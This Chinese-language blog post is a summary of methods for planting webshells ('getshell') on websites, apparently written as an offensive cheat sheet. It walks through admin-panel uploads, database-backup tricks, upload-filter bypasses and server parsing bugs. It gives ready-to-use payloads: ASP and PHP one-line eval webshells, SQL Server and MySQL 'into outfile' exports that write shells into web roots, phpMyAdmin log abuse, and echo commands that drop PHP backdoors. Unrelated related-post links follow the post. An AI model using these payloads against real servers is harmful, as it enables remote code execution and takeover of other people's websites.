一、管理员权限拿shell

需要有管理员权限才可以拿shell

     通常需要登录后台执行相关操作直接上传拿shell国内多对上传类型进行了限制,需要在进行绕过操作

1、织梦cms后台为例子

进入后台

写入一个一句话木马

长传一个一句话木马

2、数据库备份拿shell

示例:南方数据 v7.0 良精通用企业网站管理系统

方法一:

1.先上一张图马,得到路径2.选择数据库备份,将图马备份为a.asp3.访问xxx/xxx/.../a.asp. 不用管新添的后缀名

方法二:

1、将一句话写入管理员账户名【若输入长度有限制,可以按F12修改】2、创建该管理员用户。这样就将一句话写入数据库3、备份数据库为a.asp文件4、访问。。。

3、突破上传拿shell

     本地js验证上传服务器mime上传服务器白名单上传服务器黑名单上传服务器filepath上传双文件上传%00截断上传上传其他脚本类型拿shell

4、修改网站上传类型配置拿shell

有的网站在网站上传类型中限制了上传脚本类型文件,可以添加上传文件类型,如php,jsp,asp等拿shell

5、利用解析漏洞拿shell

     IIS 5.x/6.0解析漏洞          目录解析,分号解析,畸形文件名解析IIS 7.0/7.5,Nginx<8.03畸形文件名解析漏洞,php文件解析漏洞Nginx<8.03空字节代码执行漏洞Apache解析漏洞

6、利用编辑器漏洞拿shell

常见的编辑器有fckeditor,ewebeditor,cheditor

7、网站配置插马拿shell

通过找到网站默认配置,将一句话插入到网站配置中,可以事先下载网站源码,查看过滤规则,防止插马失败("%><%eval request(“abc”)%><%’)根据网站源码进行符号匹配。

8、通过编辑模板拿shell

     1、通过对网站的模板进行编辑,写入一句话,然后生成脚本文件拿shell2、通过将木马添加到压缩文件,把名字改为网站模板类型,上传到网站服务器,拿shell

9、上传插件拿shell

一些网站为了增加某些功能会在后台添加一些插件来实现,我们可以把木马添加到安装的插件中上传服务器拿shell,常见的有博客类网站dz论坛等

     示例:WordPress-V4.2.2搭建时要先创建数据库phpstudy——mysql——create database wpp;插件——已安装的插件——安装插件——下载一个正常的插件,将木马放在里面,一起上传,安装——找上传目录

10、数据库执行拿shell

可通过数据库执行命令导出一句话到网站根目录拿shell,access数据库导出一般需要利用解析漏洞xx.asp;.xml

sqlserve导出:

;exec%20sp_makewebtask%20%20%27c:\zhetpub\wwwroot\ms\x1.asp%27,%27select%27%27<%execute(request(“cmd”))%>%27%27%27

mysql命令导出shell

     create TABLE study (cmd text Not NULL);insert INTO study (cmd) VALUES(‘<?php eval($_POST[cmd])?>’);select cmd from study into outfile ‘D:/php/www/htdocs/test/seven.php’;drop TABLE IF EXISTS study;

     use mysql;create table x (packet text) type=MYISaM;insert into x (packet) values(‘<pre><body><?php @system($_GET[“cmd”]);?></body></pre>’)select x into outfile ‘d:\php\xx.php’

     select ‘<?php eval($_POST[cmd]);?>’ into outfile ‘c:/inetpub/wwwroot/mysql.php/1.php’

进入phpmyadmin

1、知道网站路径
直接执行SQL语句导入shell

注:有时可能出现不允许直接导shell

     解决方法:首页——变量——general lag 编辑——ON——general log file 编辑 D:\phpstudy\www\ba.php——SQL——一句话用引号引起来——执行——报错——生成日志,利用日志记录生成shell

2、不知道路径时——推理路径

     首页——变量——mysql的集成环境路径——apache的路径也知道了——D:\phpstudy\Apache\conf\httpd.conf——找个数据库——创建表:

create table a(a text);

开外链

 load data infile “D:/phpstudy/Apache/conf/httpd.conf” into table  a;

导出SQL搜索documentroot

路径推理

D:/phpstudy/Apache/conf/httpd.conf 配置文件的路径,找网站根目录

Apache

/usr/local/mysql

/usr/local/apache/conf/httpd.conf

/usr/local/httpd/conf/httpd.conf

/etc/httpd/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

ngnix

/usr/local/nginx/conf/nginx.conf

phpmyadmin一般在网站根目录下

     当找不到配置文件时,可以读大文件,由于文件太大会报错,有可能会报出phpmyadmin的路径。

11、文件包含拿shell 多用于上传大马

先将webshell改为txt文件上传,然后上传一个脚本文件包含该txt文件,可绕过waf拿shell

asp包含

         1.<!--#include file=”123.jpg”-->2.调用的文件必须和被调用的文件在同一目录,否则找不到3.如果找不到,用下面的语句<--#include virtual=”文件所在目录/123.jpg”-->

php包含

     <?php include(“123.jpg”)?>

12、命令执行拿shell

     echo ^<^?php @eval($_POST[‘abc’]);?^>^ >c:\1.phpecho ^<^?php @eval($_POST[‘abc’]);?^>^ >c:\1.php^<^%eval request(“abc”)%^>^ >c:\1.php

二、普通用户(前台)拿shell

     0day拿shellIIS写权限拿shell命令执行拿shell通过注入漏洞拿shell前台用户头像上传拿shellstrusts2拿shelljava反序列拿shell

或者常见CMS拿shell---------直接百度

getshell方法总结相关推荐

  1. mysql进行getshell方法

    一. into outfile 利用条件 1. 此方法利用的先决条件 web目录具有写权限,能够使用单引号 知道网站绝对路径(根目录,或则是根目录往下的目录都行) secure_file_priv没有 ...

  2. php Wrapper LFI,PHP安全之LFI漏洞GetShell方法大阅兵

    Author:LengF   Blog:www.81sec.com 0x00 题外话 关于PHP中LFI(Local File Include,本地文件包含)漏洞很多朋友都不是很熟悉,其实网络上有很多 ...

  3. phpinfo为关键的getshell方法

    漏洞实例,vulhub的文件包含漏洞(利用phpinfo) (162条消息) PHP文件包含漏洞(利用phpinfo)_Li-D的博客-CSDN博客_php文件包含漏洞 (162条消息) PHP文件包 ...

  4. 渗透测试-getshell方法总结

    一.管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作直接上传拿shell国内多对上传类型进行了限制,需要在进行绕过操作 1.织梦cms后台为例子 进入后台 写入 ...

  5. 网站后台getshell的方法总结

    方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell. 坑:通常由于权限限制, ...

  6. 【网络安全】一次实战中对tp5网站getshell方式的测试

    前言 之前接触tp5的站比较少,只知道利用RCE漏洞getshell的方式.在最近对一个发卡平台渗透的过程中,由于php版本限制,无法直接使用RCE的payload拿shell,于是结合该网站尽可能多 ...

  7. php漏洞可以过去root,phpdisk 漏洞发布 phpdisk header bypass getShell exp解析

    Author:Yaseng Team:CodePlay 1:代码审计 PHPDISK网盘系统是国内使用广泛PHP和MySQL构建的网络硬盘(文件存储管理)系统,笔者对其源码分析中,发现了一个很有意思的 ...

  8. 渗透测试-getshell学习总结

    getshell学习总结 文章目录 getshell学习总结 一.方法分类 1.带有漏洞的应用 2.常规漏洞 3.后台拿shell 二.网站常见getshell方法 1.数据库备份拿shell 2.上 ...

  9. getshell思路

    getshell能干嘛 文件上传getshell 文件包含getshell sql注入getshell 操作系统漏洞getshell RCE getshell 总结 授人以鱼,不如授人以渔 getsh ...

最新文章

  1. 中标麒麟mysql导数据_中标麒麟(linux)mysql配置记录
  2. AE教程:学会这个,你做的Logo就可以单独出道了
  3. agv matlab应用,简单介绍一下agv调度控制系统常见的软件应用
  4. mysql设置不主动提交无效_关闭事务自动提交无效,回滚也无效
  5. hdu5371(O(n)求回文子串的相关问题)
  6. Exynos4412裸机开发 —— UART
  7. 前端js获取SpringMvc后台model中传值
  8. 2021-2025年中国独立式梳妆浴缸行业市场供需与战略研究报告
  9. python学习网站-关于python学习,最系统的学习网站看这里
  10. VS Code中powershell无法运行cnpm, vue等命令
  11. Labview笔记(十)---文件IO (中)---读写 配置文件,XML文件
  12. 用于HTML5移动开发的10大移动APP开发框架
  13. 苹果鼠标滚轮驱动_黑苹果仿冒秒控鼠标
  14. Unity 利用射线实现弹孔效果
  15. python歌词图表分析_Python可视化图分析毛不易的《入海》,看看听歌的人都在想些什么...
  16. 手机怎么调整照片分辨率?照片清晰度dpi怎么调整?
  17. 使用sklearn进行增量学习
  18. 基于Android的房屋租赁系统
  19. 中国56个民族脚本数据
  20. ubunutu个人配置

热门文章

  1. 【SSM】nested exception is org.apache.ibatis.binding.BindingException: Invalid boun原因总结
  2. Mybatis奇淫技巧
  3. Windows server 2003 安装vs2005 sp1补丁包报1718错误的解决方法
  4. error: call to implicitly-deleted copy constructor of 编译报错分析
  5. 魅族M8开发初识及一点思考
  6. Hadoop HDFS完全分布式环境搭建以及技术详解(保证没接触过大数据的小白看完就能独自把集群搭起来,并对HDFS有详细的认知)
  7. LeetCode-638. 大礼包
  8. (4)(4.6.8) 电子调速器(ESC)校准
  9. 随机生成及检测8位密码:必须由大写字母、小写字母、数字和特殊符号共同组成
  10. 头条、快手,那些我曾经错过的暴富机会 | 程序员有话说